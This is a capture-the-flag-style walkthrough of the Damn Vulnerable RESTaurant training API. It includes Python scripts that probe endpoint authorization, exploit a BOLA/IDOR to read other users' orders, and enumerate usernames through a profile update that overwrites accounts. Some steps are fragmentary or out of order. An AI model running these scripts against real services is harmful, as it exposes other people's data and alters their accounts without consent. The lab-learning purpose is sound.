Damn Vulnerable RESTaurant
Last updated
You need to install Docker first. Here is the process for Ubuntu:
Get the Docker Desktop .deb package from [here](https://desktop.docker.com/linux/main/amd64/docker-desktop-amd64.deb?utm_source=docker&utm_medium=webreferral&utm_campaign=docs-driven-download-linux-amd64)
The API service will be exposed at http://localhost:8080 by default. API documentation can be found at the following endpoints:
Swagger - http://localhost:8080/docs
Redoc - http://localhost:8080/redoc
To close the restaurant at the end of the hacking day, just run:
./stop_app.sh
Data will persist between stops and starts.
Here is our token:
We can now add our token to a request. Let's try this on the /profile endpoint.
Then we get a response with information about our user, so authentication works.
If we try to set our role to "admin" with the update role endpoint, we get a 500 with our token and an unauthenticated response without a token.
We could try to find a way to get a list of the roles, or at least which other roles exist besides customer. Let's try the other requests from the Swagger UI to check what each one does and enumerate further.
works with and without authentication
works with and without authentication
does not work without authentication
We get a forbidden with a customer token
Same with PUT /menu/id
Does not seem to work with my token or without one; the request times out
Does not work without token but works with a customer token
Works only with token
Works only with token
Note: it would be worth checking if I can get another user's order here.
For the auth category of requests we should be good for now. At some point I will check what happens with the password reset.
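The with-token / without-token matrix above is easy to automate: read the operations out of the OpenAPI document behind the Swagger UI, hit each one twice and classify the answer pair with the same labels used in these notes. The script below is an added example written for this write-up, not code from Damn Vulnerable RESTaurant; only the base URL and the /menu, /profile and /orders paths come from the page. The /openapi.json path, the Bearer header scheme, and the reading of a 422 as "got past authentication to body validation" are assumptions, and the spec and status table it runs on by default are a constructed offline fixture.

```python
"""Probe every operation in an OpenAPI spec anonymously and with a
low-privilege token, then label the auth behaviour (added example)."""
import json
import re
import sys
import urllib.error
import urllib.request

BASE_URL = "http://localhost:8080"   # from the page
SPEC_PATH = "/openapi.json"          # assumption: JSON spec behind /docs


def list_operations(spec):
    """Return sorted (METHOD, path) pairs declared in an OpenAPI document."""
    ops = []
    for path, item in spec.get("paths", {}).items():
        for method in item:
            if method.lower() in ("get", "post", "put", "patch", "delete"):
                ops.append((method.upper(), path))
    return sorted(ops)


def fill_path(path):
    """Replace path parameters such as /menu/{item_id} with a dummy id."""
    return re.sub(r"\{[^}]+\}", "1", path)


def _reached(status):
    # 422 is a body validation error: the request got past authentication.
    return status is not None and (status < 400 or status == 422)


def classify(anon, auth):
    """Label a (no-token, customer-token) status pair the way the notes do."""
    if anon is None or auth is None:
        return "timed out"
    if _reached(anon) and _reached(auth):
        return "works with and without authentication"
    if anon == 401 and _reached(auth):
        return "works only with token"
    if anon == 401 and auth == 403:
        return "forbidden with a customer token"
    if auth == 500:
        return "500 with a token (worth a closer look)"
    return f"other: anon={anon} token={auth}"


def http_status(method, url, token=None, timeout=5):
    """Send one request with urllib; return the HTTP status, or None on timeout."""
    req = urllib.request.Request(url, method=method)
    req.add_header("Accept", "application/json")
    if token:
        req.add_header("Authorization", f"Bearer {token}")  # assumption: Bearer scheme
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except (urllib.error.URLError, TimeoutError):
        return None


def probe(spec, token, send=http_status, base_url=BASE_URL):
    """Return {(METHOD, path): label} for every operation in the spec."""
    results = {}
    for method, path in list_operations(spec):
        url = base_url + fill_path(path)
        results[(method, path)] = classify(send(method, url, None),
                                           send(method, url, token))
    return results


# Constructed offline fixture (not the real spec or real responses) so the
# script runs without the lab: a few endpoints and what each answers.
SAMPLE_SPEC = {"paths": {
    "/menu": {"get": {}, "post": {}},
    "/profile": {"get": {}},
    "/orders/{order_id}": {"get": {}},
}}
SAMPLE_STATUS = {  # (METHOD, path) -> (without token, with customer token)
    ("GET", "/menu"): (200, 200),
    ("POST", "/menu"): (401, 403),
    ("GET", "/profile"): (401, 200),
    ("GET", "/orders/1"): (None, None),
}


def sample_send(method, url, token=None, timeout=5):
    anon, auth = SAMPLE_STATUS[(method, url[len(BASE_URL):])]
    return auth if token else anon


def demo():
    return probe(SAMPLE_SPEC, "customer-token", send=sample_send)


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python probe.py <customer token>
        with urllib.request.urlopen(BASE_URL + SPEC_PATH, timeout=5) as resp:
            results = probe(json.load(resp), sys.argv[1])
    else:
        results = demo()
    for (method, path), label in results.items():
        print(f"{method:6} {path:25} {label}")
```

Two things to keep in mind when pointing this at a live target: POST, PUT and DELETE operations are sent with an empty body, so they are state-changing requests that happen to fail validation, and a 500 on a request that carried a valid token (as with the update role endpoint above) is a server-side failure rather than an authorization decision, which is exactly why it deserves a second look.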
This one seems interesting. Let's check it out. Without a token it returns a response saying we are unauthenticated, and with a token we get this:
So here we get another role "chef".
Let's try the update role endpoint again with chef as the role and see what we get. We still get a 500, and if we try with "Chef" we get this response:
I also tried mass assignment by adding a role field to the PUT /profile body, but that did not get me anywhere either. So let's explore other things.
First let's create another user to see if we can access other users' orders.
Now let's check whether we can see order 1 (the order placed with our first user) with our new user. It works! So here we have a BOLA (Broken Object Level Authorization), also known as IDOR:
With Burp Community, Intruder is too slow. Let's try another fuzzer.
If we go to the docs, we can find an endpoint to register a new user. Let's do this first. We can intercept the request with Burp to modify the fields (we can also use the Swagger UI).
Now we can log in with the POST request that gets a token; this gives us a JWT.
There's also an endpoint that updates a user, so let's see whether we can update our own user with it.
Let's place an order as this user. To do this we first need a token, and then we can put our token in the POST /orders request. Our order is created with id 2:
Now I want to have a look at the /profile endpoint. I can modify my own information; how about other users' info? Let's see whether the user csbygb has been modified with the "pwned" strings in the fields. It did work. Earlier I had tried to add a Chef role on my own user but not on another user; that did not work either. What's interesting here is that if the user is valid our user info gets sent back to us, but if not we get a 500. So we could try to enumerate users.
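Both findings above, reading another user's order by id and the 200-versus-500 behaviour of the profile update, lend themselves to a small script. The one below is an added example written for this write-up, not code from the project: it walks GET /orders/{id} with a second user's token and reports every order that came back but belongs to someone else, and it uses the profile update as a username existence oracle. Assumptions, marked in the code: Bearer tokens, JSON bodies, an order's owner in a "username" field, and the update body naming the target in "username". The users and orders it runs on are a constructed fixture; pass the default `send=http_json` to hit the lab instead.

```python
"""BOLA walk over /orders/{id} and a username oracle on the profile
update, with a pluggable transport (added example)."""
import json
import urllib.error
import urllib.request

BASE_URL = "http://localhost:8080"  # from the page


def http_json(method, url, token=None, body=None, timeout=5):
    """Send one request; return (status, parsed JSON body or None)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Accept", "application/json")
    if data is not None:
        req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("Authorization", f"Bearer {token}")  # assumption: Bearer scheme
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, raw = resp.status, resp.read()
    except urllib.error.HTTPError as e:
        status, raw = e.code, e.read()
    try:
        return status, json.loads(raw)
    except ValueError:
        return status, None


def find_bola(me, token, id_range, send=http_json, base_url=BASE_URL):
    """Walk GET /orders/{id} as user `me`; return ids of orders that were
    returned but belong to someone else. A correctly authorized API would
    answer 403 (or 404) for those instead of 200."""
    leaked = []
    for oid in id_range:
        status, order = send("GET", f"{base_url}/orders/{oid}", token)
        # assumption: the order JSON names its owner in a "username" field
        if status == 200 and order and order.get("username") != me:
            leaked.append(oid)
    return leaked


def enumerate_users(candidates, token, send=http_json, base_url=BASE_URL):
    """Use the 200-vs-500 behaviour of the profile update as an existence
    oracle. Caveat: every probe is a write, so a hit also overwrites that
    user's profile; only do this in the lab."""
    found = []
    for name in candidates:
        # assumption: the update body carries the target in "username"
        status, _ = send("PUT", f"{base_url}/profile", token, {"username": name})
        if status == 200:
            found.append(name)
    return found


# Constructed offline fixture standing in for the lab (not real data):
# two users, one order each, and the behaviour the notes describe.
FAKE_USERS = {"csbygb", "eve"}
FAKE_ORDERS = {1: {"id": 1, "username": "csbygb"}, 2: {"id": 2, "username": "eve"}}


def fake_send(method, url, token=None, body=None, timeout=5):
    path = url[len(BASE_URL):]
    if not token:
        return 401, {"detail": "Not authenticated"}
    if method == "GET" and path.startswith("/orders/"):
        oid = int(path.rsplit("/", 1)[1])
        return (200, FAKE_ORDERS[oid]) if oid in FAKE_ORDERS else (404, None)
    if method == "PUT" and path == "/profile":
        if body["username"] in FAKE_USERS:
            return 200, {"username": body["username"]}
        return 500, None
    return 404, None


def demo():
    """Second user 'eve' reads order 1 (csbygb's) and learns which names exist."""
    leaked = find_bola("eve", "eve-token", range(1, 6), send=fake_send)
    users = enumerate_users(["csbygb", "alice", "eve"], "eve-token", send=fake_send)
    return leaked, users


if __name__ == "__main__":
    print(demo())  # runs against the fixture; use send=http_json for the lab
```

The enumeration half is worth a pause even in a lab: because the oracle is the update call, each name you test is a write, and every hit leaves that user's profile overwritten with whatever you sent. If the same valid/invalid difference exists on a read-only endpoint, prefer that for the enumeration and keep the write for proving the authorization bug once.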